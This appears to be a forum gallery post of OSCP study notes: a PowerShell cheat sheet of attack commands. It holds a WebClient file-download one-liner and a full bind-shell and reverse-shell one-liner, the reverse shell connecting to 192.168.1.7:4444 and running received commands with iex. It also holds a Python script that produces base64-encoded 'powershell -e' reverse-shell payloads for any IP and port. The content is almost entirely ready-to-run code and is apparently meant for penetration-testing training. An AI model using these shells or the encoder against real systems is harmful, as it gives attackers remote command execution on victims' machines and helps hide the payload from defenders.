Limbo

Offensive Security Certified Professional‬‎ / OSCP |Module4 - Practical Tools 3

Limbo, May 23, 2020
HP515 likes this.
    There are no comments to display.
  • Album:
    OSCP
    Uploaded By:
    Limbo
    Date:
    May 23, 2020
    View Count:
    58
    Comment Count:
    0
  • Code:
    PowerShell
    
    ##########
    Intro:
    
    Set-ExecutionPolicy Unrestricted
    Get-ExecutionPolicy
    Get-ChildItem
    Get-Alias
    ---------------------------------------------------------------------------------
    PowerShell File Transfers:
    
    powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.7:8888/out.zip','C:\Users\limbo\Desktop\out.zip')"
    ---------------------------------------------------------------------------------
    PowerShell Bind Shells:
    
    powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
    ---------------------------------------------------------------------------------
    PowerShell Reverse Shells:
    
    powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.7',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    ---------------------------------------------------------------------------------
    
    ----------------------------
    #!/usr/bin/env python3
    #
    # generate reverse powershell cmdline with base64 encoded args
    #

    import sys
    import base64

    def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:pORT")
    exit()

    try:
    (ip, port) = (sys.argv[1], int(sys.argv[2]))
    except:
    help()

    # payload from Nikhil Mittal @samratashok
    # https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

    payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    payload = payload % (ip, port)

    cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

    print(cmdline)